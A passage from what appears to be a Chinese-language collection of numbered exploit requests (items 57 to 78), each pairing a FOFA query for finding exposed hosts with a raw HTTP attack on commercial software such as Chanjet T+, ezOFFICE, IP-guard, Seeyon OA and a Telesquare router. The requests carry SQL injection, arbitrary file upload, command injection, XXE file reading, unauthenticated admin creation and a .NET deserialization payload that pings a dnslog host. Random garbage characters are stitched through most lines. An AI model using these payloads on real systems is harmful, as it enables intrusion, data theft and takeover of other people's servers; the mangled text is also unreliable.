1 w d2 T6 D. m x6 p4 G. j; i iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( t1 h! ]" k& r- V+ kContent-Type: application/json
- U- u6 M9 c+ u' `% _0 F. h: u
& z7 g, R5 H. b$ ?, c% B3 K' ]8 ^{
1 x! [' C. r; U2 i; M0 i8 {/ A "storeID":{
& Q5 s9 m* U- @3 B/ R, ? "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
8 V$ T% i( ~4 {1 @ "MethodName":"Start",8 @; e' ?$ \3 P/ z a9 w% A' U
"ObjectInstance":{
& I$ y0 \0 |3 k. m: u% M9 X "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 i7 l o9 N* {! E7 K "StartInfo": {9 ^7 y4 S0 p. t, h* @- v
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# `( O$ x3 B1 ] d, J "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
% {. F+ O4 i5 j2 S% }* [- R }
$ |+ T; j- Z3 Q" Z5 H; U+ F9 d }
( M& r0 A. g8 S. s }, ^: \! ^4 O i1 B+ r
}' P. k3 s5 v: @" B
0 T' M3 O- }- T2 j( k5 U- b5 M' R% W0 p% e s
57. 畅捷通T+ keyEdit.aspx SQL注入, Z( t, ?" S& ~- u1 p& R( m& K
FOFA:app="畅捷通-TPlus"# F9 G9 k- |3 v+ ]/ c3 I& d: @
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
0 A7 G1 _9 D/ a) UHost: host
1 ^) w9 B$ y2 Y eUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. c* j6 W) D4 c5 U' B: U$ G- uAccept-Charset: utf-85 ~- G9 y/ W; p" r% v9 `: R
Accept-Encoding: gzip, deflate! h1 q! b) H6 P0 M+ d# p* V
Connection: close6 E0 w. w0 {3 l% q) A
6 d5 d! V, T$ O2 _4 ]2 Z) A) i3 V
& J( C3 z: S; X/ \58. 畅捷通T+ KeyInfoList.aspx sql注入
7 T- P- G' U7 v7 C2 d: w+ R4 C! mFOFA:app="畅捷通-TPlus"
. ?7 u& E4 ~7 x9 r W4 pGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1. o% T- d2 P7 k9 @, G
Host: your-ip
0 k3 V! D8 j ^8 |1 L2 d5 d* u' a, OUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! y5 B* p$ c3 o2 `$ X; k$ xAccept-Charset: utf-8% ^% _ O% V; m, ]2 H `6 A$ V# j
Accept-Encoding: gzip, deflate
' v* R8 k. G1 u: X: z8 q0 OConnection: close
& [1 c" k% @# ^9 V& h" g$ K( x1 i0 B. [- K0 l
: ~6 G L% b2 E, e, @: n- t3 Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 S* \4 Q8 H+ N5 E0 R) I4 wFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"; N: y2 {( |/ }3 K; C
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.16 k- M- F4 z6 |6 P: q5 v* X. X, @; W
Host: 192.168.86.128:90905 Z) F' Z$ e" V3 x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
) ?, C# Z+ n! G2 j% tConnection: close( @4 j0 {# L8 Q% W9 A
Content-Length: 1669: K" g9 u( B8 b. s' c& F1 ~8 j! O
Accept: */*, [) Z- q( B) z8 Y
Accept-Language: en
; X( z, D5 c/ h" Q9 R0 e2 x, p9 }* ^Content-Type: application/x-www-form-urlencoded
/ x$ L6 Y" ^3 }9 ]- ]& DAccept-Encoding: gzip6 _4 g8 J; V6 p4 p
4 [9 \# r. h& WPAYLOAD
2 N# k9 g$ H$ y$ B/ D- J7 q
3 f0 ]1 J) k8 b& t0 D
% u5 s) G4 d; f( Y2 u# X60. 百卓Smart管理平台 importexport.php SQL注入
3 A$ l4 l4 {, B/ \FOFA:title="Smart管理平台"
6 G# l6 |6 x# c" h( P" U8 p. tGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
) U6 n# k% L8 T& n( h$ D0 b& T0 R+ FHost:
8 n3 z& ~6 U. CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 c. T& J1 v( S" Z3 M |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 b# |7 ^7 N- g# L3 O, n/ GAccept-Encoding: gzip, deflate+ l( `! k: ]. {
Accept-Language: zh-CN,zh;q=0.9
: m/ y- J" M9 ?, Q' z! u* A' dConnection: close
- P) D/ ]8 s" [( a" h+ o7 K2 ^/ [5 F5 {" L9 M/ z
" H* P# R/ _0 L9 p4 a
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传9 ?1 g+ ?: Y% O2 ?7 Z
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
! o6 R% g3 d" c# _/ PPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
; {+ s5 ^! P+ T5 P/ N/ FHost: x.x.x.x
" s0 R! F; {6 c. o* I( f" [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' b( R! y; ]) _; e6 u
Connection: close
4 _ ]0 Z9 v; K/ ?& }& rContent-Length: 271 q* A* W; g; `/ {3 H
Accept: */*
/ ~* l0 j3 v! R8 i% E( PAccept-Encoding: gzip, deflate2 o! R2 R8 u+ N8 f+ A- Q
Accept-Language: en
; q5 S9 Q4 G) D/ N! k' |: WContent-Type: application/x-www-form-urlencoded& i: A6 _* f$ l
, X( Z' A; D; } Y @# ?
8uxssX66eqrqtKObcVa0kid98xa
& Q7 H2 p: G+ ^% g" ^8 L Q6 x
5 C" }2 X8 S. |) e0 x1 j62. IP-guard WebServer 远程命令执行3 S: r+ G" n7 e5 P% g4 }1 Q
FOFA:"IP-guard" && icon_hash="2030860561"
( A5 k/ C: Q: D2 T" C2 E' ~1 j* qGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ O* `8 z! A7 L; H
Host: x.x.x.x( Q5 q5 D1 n; { T
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
# S5 o" k& G$ z5 TConnection: close
3 O1 }( f/ n& s" g% D4 z2 sAccept: */*
& A1 c8 v) L0 D$ m; Q* }: ~Accept-Language: en
5 c9 J9 ~7 N; m3 \1 @5 k& iAccept-Encoding: gzip3 J5 s2 x" g* w2 w3 @ W) e4 |
2 V, H2 f; ]; @9 @7 d0 D8 q7 Z& u( p
访问; ^9 }% G: e4 T* A9 E
1 ^+ K. m) E/ B2 e; z) e
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& F* k) R6 E5 q& z
Host: x.x.x.x
, S) _" X( X. @3 E8 I9 y5 x- | S: c: S& L' A- T
! F" B9 L9 [, O+ {63. IP-guard WebServer任意文件读取
) j3 p* \% v8 A1 _7 GIP-guard < 4.82.0609.0) P" T0 f4 v! F; U
FOFA:icon_hash="2030860561", O& ?& s y' M7 l' j5 B. Y3 z6 s
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
) P0 g/ w/ Z6 o F9 g. J, N. `Host: your-ip
- B1 K1 d" w/ d [3 L! r0 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% S) h9 h" K p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
z7 G" t, e4 I, ~Accept-Encoding: gzip, deflate& M$ d) l6 ~' K$ S$ J
Accept-Language: zh-CN,zh;q=0.9
$ G# C/ }5 J5 L% S) r7 z: JConnection: close; a/ q$ S$ k- A' [, ]. A& E) R
Content-Type: application/x-www-form-urlencoded
7 C' q3 {) {4 m N' X
1 |; F! b2 Q2 p7 {+ |+ O! f. @- U) x( Xpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A; {" f( ^' K2 [2 G/ d; ?5 ?1 s
& [0 G: i2 m& F2 {) v" A# k
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
7 r7 n9 X: V, | a$ ^) [FOFA:body="/Scripts/EnjoyMsg.js"/ E& b4 G% q2 }9 ~9 _9 D" S+ L9 ^
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
0 V# v/ H$ ^0 Y) k" m3 n' cHost: 192.168.86.128:9001
7 D, `/ T6 u$ |3 `User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.361 b }8 d+ B5 @6 ?9 h
Connection: close O) A4 u" u6 O
Content-Length: 369
3 K! o) m z# u& U6 UAccept: */*
. J+ n' P8 \3 @% s1 i3 N% l8 P7 rAccept-Language: en0 p$ E0 {6 r( N) Y# d
Content-Type: text/xml; charset=utf-8
6 u' O( n- e( V; A! dAccept-Encoding: gzip% v! a7 X2 I; \/ P
: o0 Z( u+ E0 N+ A; }* J, X! Y<?xml version="1.0" encoding="utf-8"?>( i9 ~4 X0 e) N. E
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% m9 [6 \3 |* z<soap:Body>6 k3 I. A$ q; W6 ]" e$ t
<GetOSpById xmlns="http://tempuri.org/">
8 I4 h" e8 s- L! d$ f8 K1 k <sId>1';waitfor delay '0:0:5'--+</sId>
% [ ?, U! d+ c. V* k) d/ d D </GetOSpById>
2 N2 ^9 Z3 A7 E% j3 H6 w4 T) b </soap:Body>
4 o: ?5 v( b2 S; }( [2 Y</soap:Envelope>! }7 f+ C- Q4 c8 ^% `1 T
( E; F! h3 X5 u' x* W
7 C; e M5 i' v, a7 u' K$ Q: y65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: C7 @4 P; w5 z* BFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"9 i0 |& k9 v+ w8 i# R+ U
响应200即成功创建账号test123456/123456
/ Y* |. ]/ i0 U- `3 Y( hPOST /SystemMng.ashx HTTP/1.1/ j: P: ?7 x* v4 m" b
Host:% Q3 _: I3 A: @ |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)+ n( r, @: J. C, |5 f3 j' v) T
Accept-Encoding: gzip, deflate
?% [/ c9 k6 A# S- CAccept: */*/ p6 H7 e7 T0 L4 ^# z5 x: @0 r# B
Connection: close
- }' i( r* x. l" \Accept-Language: en4 y# W }; z- {) Y$ n j
Content-Length: 174: ~" v6 [- F% G, D
: n& \9 P# r# R4 UoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 s& |4 R& B) q3 E% e4 q2 |; `- ]8 x. |, M
4 A4 L l4 ~# P( E/ Q1 \; D
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
! ~! i5 S3 O1 `% x( wFOFA:app="万户ezOFFICE协同管理平台"- [( J7 q/ F. S2 q3 a
# H6 W# L& w+ c* n" {GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 m9 d# @9 Y6 L5 S
Host: x.x.x.x
+ U, C2 K. _8 `- h, [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 E, G) \6 q; o) E4 Y5 R; MConnection: close
# {% H4 I* X" S" D. t6 T0 MAccept: */*8 g7 T" @0 @ G7 V* i: n. p
Accept-Language: en
0 ?( L( U6 m7 w% R; v- w7 {Accept-Encoding: gzip
+ X- q7 w6 j& y1 z" r+ O+ H1 ?: |; U; M, x5 Y' g
Y/ {; v$ t0 j6 r第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在- U* L/ \5 t9 N$ g$ g
( z, E( u: Z3 t# r$ ^
67. 万户ezOFFICE wpsservlet任意文件上传
( c' \. N/ J; X1 L8 J" B3 xFOFA:app="万户网络-ezOFFICE"
$ g' V/ W" B- W, znewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ k4 A' X- B2 I
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
$ d3 v4 z- I: yHost: x.x.x.x
. u' L" v! a$ F8 f+ \* M' i2 c7 }" VUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0: g# u4 ?( h4 q% h4 I
Content-Length: 173
8 j* l% @; t$ Z- |& h8 [7 u& [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
9 f5 l( O9 S$ E" T) T7 F% m; Z: BAccept-Encoding: gzip, deflate1 P, r; ]9 x1 g" j5 l
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- |* N6 T6 i: W aConnection: close
2 n9 V. Q [' V2 r* i, n1 Q2 PContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
* W; I) R, t0 g% i6 U: s8 ?2 [DNT: 1
1 v5 e2 x3 R2 |2 ]8 L! y2 zUpgrade-Insecure-Requests: 1
* I, H4 _ H5 H) a4 E. g7 d1 {' ~7 I3 t3 ?" m- T9 x
--ufuadpxathqvxfqnuyuqaozvseiueerp
0 A7 _1 P8 L) M/ Y7 J% IContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
( y! F! d& |$ b& V& y, _, l$ a, \/ l2 E. b5 Y4 S) k3 g+ G
<% out.print("sasdfghjkj");%>
. `! H# \& o/ V0 V, P--ufuadpxathqvxfqnuyuqaozvseiueerp--4 H0 F0 ?! x o8 [
8 q; z) O9 V! h. j! [1 Y4 p: Q
3 q' h7 v% ?6 L* d# d文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
6 d" I3 c5 F. @* ^6 F1 A4 I0 y" |. }! p
68. 万户ezOFFICE wf_printnum.jsp SQL注入
0 E2 d& ~- g) B8 \2 X, t) pFOFA:app="万户ezOFFICE协同管理平台"! M" _* y+ t" j2 U
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 }4 E) x) V# e0 y
Host: {{host}}: C' j8 V5 y( _7 F: @' q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36& U. `* A1 [* \, w- H6 y/ d
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 p! X$ C0 x+ s/ v: ~3 d; d VAccept-Encoding: gzip, deflate. u# `! q$ S' \
Accept-Language: zh-CN,zh;q=0.9
$ l4 d6 i! W0 [9 K$ gConnection: close/ ^+ F# U8 o6 h, U* [; d* p+ b
/ T! [5 G0 D" o
4 c/ O) Z; u8 b0 X5 V* \69. 万户 ezOFFICE contract_gd.jsp SQL注入" R# z9 Z; ?2 B
FOFA:app="万户ezOFFICE协同管理平台"9 g6 P: n/ n0 }5 @1 r# V# p
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
* T# w) k6 p& A& gHost: your-ip
. R0 }6 ^ {) P& ^2 w: c/ NUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, e+ |, G( s# ^4 wAccept-Encoding: gzip, deflate
+ _$ _) D$ H& J. QAccept: */*
/ t6 a5 {8 J1 WConnection: keep-alive* o. d; U8 @6 t! C
8 w! j# k/ j" K0 W( D0 t1 r+ B
D' A0 D. ~& G6 w
70. 万户ezEIP success 命令执行& i+ ]6 s, y+ H, V: N' K* O
FOFA:app="万户网络-ezEIP"
( L" M8 g; Q9 F* c0 M1 o- ]POST /member/success.aspx HTTP/1.1
+ m* p4 @! Q8 p5 j h) d" FHost: {{Hostname}}6 X# |( F# ^& o [' E0 k/ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 \! s- m! G5 {# f+ r; \SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
0 k, Z! ?+ }; l" _3 k# I1 NContent-Type: application/x-www-form-urlencoded
4 ]1 }/ _5 r5 q0 gTYPE: C
! ?3 Y- z9 s/ T9 u: F6 CContent-Length: 16702- V% W. _6 K+ `' |4 W' k7 m/ r
. W* V: _# x! Q ?* _* k
__VIEWSTATE=PAYLOAD
+ Y# V* R' \, d; @ `1 L* R0 O' B' u2 v; J& I8 ~5 v8 ?
& Z$ y. j* Q9 p. n71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
0 d4 J8 M/ a) TFOFA:body="PM2项目管理系统BS版增强工具.zip"6 t8 z; I& @2 p- q
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
7 o2 E% F2 u5 u" b9 x$ _$ eHost: x.x.x.xx.x.x.x- G. A2 Q9 Z4 W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 e7 _8 D7 E. r, F) tConnection: close2 h: k& h& n3 R: v9 F0 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* ?8 @# z& i+ E) z( L, rAccept-Encoding: gzip, deflate
, \5 K; f2 ?: }+ j- lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* h1 p) D6 u A6 {' h3 `, }0 Z, g, BUpgrade-Insecure-Requests: 1& c. P2 i+ M7 ~3 W" a
4 r7 h+ Q% o7 H) G9 S1 e
! M, X7 r E3 N' w. e9 @
72. 致远OA getAjaxDataServlet XXE1 X+ W3 z, E; G4 p# s& Y8 q
FOFA:app="致远互联-OA"
: L# d& K/ u5 K0 _& _POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1; x; L: K/ E5 m- K* G- l) q
Host: 192.168.40.131:80993 b$ d; ]3 r1 U2 v$ }( F
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
a* L+ @- Z7 _Connection: close; D4 z* r1 r0 ^7 ? W
Content-Length: 583
( P3 _' a' M5 MContent-Type: application/x-www-form-urlencoded
* L* e" b( v! P" K7 A7 o/ QAccept-Encoding: gzip
; K+ F& @" K8 u$ m) d% F: Q0 x1 x% B' z1 @ ^
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
0 H* L( M4 L4 b3 W
+ t) z; I/ R2 \. h9 ]
! H9 K" C" f' \% z0 U+ ~73. GeoServer wms远程代码执行
" a+ P" F }, R8 g% @FOFA:icon_hash=”97540678”
# @5 c& [9 @/ W0 `; GPOST /geoserver/wms HTTP/1.15 U( | ?" {$ z5 U9 S6 u
Host:8 h' q$ U1 B: c$ ~. f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) F3 ?% R! ^1 f9 m2 S( U9 lContent-Length: 1981
9 I9 k) H. V( X1 M* J- YAccept-Encoding: gzip, deflate
* _* k, O. L# |, k- Z( a; PConnection: close
/ X9 T9 X7 T5 w6 c$ N; L: vContent-Type: application/xml. h3 o1 e# j: U1 {/ Q: c
SL-CE-SUID: 3
% w: I( y2 J! c2 B) f! T; s
2 b. H" J: J& Q5 p9 g: e5 t7 O1 NPAYLOAD& u6 p% z' G9 \. ^
# V- Y8 J5 l* B
& D- r' b' o: |/ V
74. 致远M3-server 6_1sp1 反序列化RCE% _1 G0 Y+ m; a- S& }! k+ O
FOFA:title="M3-Server"
$ J2 {+ }2 [. mPAYLOAD
6 J% L" }' x2 L9 F" {" p. x6 Y1 N& w1 e( \ l$ x
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE0 @- [, x8 W5 V; _0 n6 I5 ]
FOFA:app="TELESQUARE-TLR-2005KSH"
8 | }- f( V1 Y1 @6 aGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
4 P( C; f( u( E+ m$ t- r) nHost: x.x.x.x
3 ?3 A0 S' T& }, A" a: L% P2 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* R8 j. C. f) t' dConnection: close v9 f% b( b8 T1 Z: K; [& Z. u( l
Accept: */*
' Z' v! t1 _8 c+ v( uAccept-Language: en
2 u; m: |! M; b7 y6 W2 t! \Accept-Encoding: gzip
9 A: ~9 B, V" P/ c6 W# v' v5 B
, R1 q" z, v" T& @( k! q. j6 H! |7 q9 b$ b
GET /cgi-bin/test28256.txt HTTP/1.1
1 T: t/ w5 J4 H2 r" F% E mHost: x.x.x.x
, F# K2 L/ ^( y: C
0 ]! u) j6 J2 t9 H. ~( z+ q9 R5 O& X ~- ?4 u
76. 新开普掌上校园服务管理平台service.action远程命令执行' e) E0 v( a3 t: o- J
FOFA:title="掌上校园服务管理平台"- y$ ^; Z! m1 ~1 |4 ^2 V
POST /service_transport/service.action HTTP/1.1* R# W$ U5 k4 G L& J" y* ?
Host: x.x.x.x) S: O) T' c/ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
W1 u. X3 ]8 U4 vConnection: close
0 D7 ]% G$ v( PContent-Length: 211
1 |" \" Y* ?" y; O8 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# l4 q7 M4 N+ X j. L9 ]Accept-Encoding: gzip, deflate
# u* G$ `" S" ]: y% \# IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Z$ K! {! t+ j9 M; w: [5 _
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
w8 E1 S& C: b$ H9 \5 g E, S' gUpgrade-Insecure-Requests: 1. `6 \+ m* v& D7 Z( P2 P/ J( E3 m
7 L2 d3 T& H* A+ ^, V
{
# A! d: d* c( G+ q, N# b) y$ Q"command": "GetFZinfo",& \0 T+ K+ V& V `1 N9 s) H1 Y% l
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\". y8 W8 B/ B/ {: Z4 y
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"& a0 ~, W) A) Z7 j
}0 m) e: n2 x! a$ X0 o9 d& `
4 I6 T( z2 f7 l: a! v/ d! |: D: u5 u) ~9 V% o
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1* s9 p2 [$ _+ }/ r" Q
Host: x.x.x.x8 I7 O1 ^2 Z! X. e
, r7 P1 Y) A$ L+ y/ U) G1 r" a! j" x* y* m" F! @. J
/ H" V* R- Q3 M$ s" s/ `, O
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
& p% ^% h0 _0 [( z* `- b0 `1 VFOFA:body="F22WEB登陆"
4 }9 f* N9 K- t1 r \ V8 YPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1$ ?( A+ |! R: v2 s6 Q" S5 u
Host: x.x.x.x% d2 t( s' [+ C$ s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; O8 s& A( n& O" P( N, O! _Connection: close
0 e8 a4 Z J9 V* t. y2 V; _Content-Length: 433
+ }4 k* b$ a. `Accept: */*
7 _' o& v! U7 N: I' TAccept-Encoding: gzip, deflate
8 s( M5 Y6 S& x# l. Z9 I! I: x: BAccept-Language: zh-CN,zh;q=0.9' _$ G- C( s0 A O3 F5 b3 c: u
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix* i" A7 ~' m' U7 i5 H/ @4 N' E
- {: j u3 l* k; g------------398jnjVTTlDVXHlE7yYnfwBoix! Q# y: l" k. ?- c. p0 {: o
Content-Disposition: form-data; name="folder"3 k* H W- g: G4 R: L; t
% C7 ^6 [! c _4 t' }# N# |
/upload/udplog' A0 M& ^ W; \8 M
------------398jnjVTTlDVXHlE7yYnfwBoix1 b$ m' G: ^5 I
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
$ P# o, ]& r# E- w% H% XContent-Type: application/octet-stream7 {9 S* V' o. { J1 p0 \3 @8 g
+ Y: l2 X" Q8 `% ^3 M; \
hello1234567( s p" l+ i* s) h% S7 C
------------398jnjVTTlDVXHlE7yYnfwBoix
; m& b1 l5 V3 W/ Q; R9 fContent-Disposition: form-data; name="Upload"
6 F" ?6 f: {9 Y$ T M1 `$ m9 z
/ h8 Q6 h/ ?0 j( S/ bSubmit Query
/ A0 l" f: @; l2 d; \1 Z------------398jnjVTTlDVXHlE7yYnfwBoix--
; G' o1 w- F. W2 g. c4 a) ^ W; O
H' E T) y5 f' ~
/ l: e2 _3 ?) m7 d& I% H$ ~; {% _! }78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传6 P, I/ Y% i1 F( N
FOFA:icon_hash="2001627082"
( ]3 G# @5 P$ qPOST /Platform/System/FileUpload.ashx HTTP/1.1
; G3 A9 u. s: uHost: x.x.x.x: t2 N0 ?# W* @4 n0 }5 S& g' x! S/ I/ h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# M% I) o7 e# m4 _Connection: close9 B/ d; u% m0 ^, ?
Content-Length: 336
3 j0 K8 @/ ?; u& a& e" Y mAccept-Encoding: gzip/ F! a7 R- O9 G+ z* [
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l) I4 |$ H0 F: r$ d, G/ H- \. e
?; e: F5 u* [4 |% ]+ e& B
------YsOxWxSvj1KyZow1PTsh98fdu6l' k+ P7 I- U9 U
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
; Z. U, e3 {, m) pContent-Type: image/png d: V& Z) g( x0 q' |- G7 Q1 B2 @9 D
: {; k7 H4 g4 E: M5 L- T, y/ f
YsOxWxSvj1KyZow1PTsh98fdu6l3 ?( T' W+ |1 w; X" C6 U. G& }# j/ H5 V
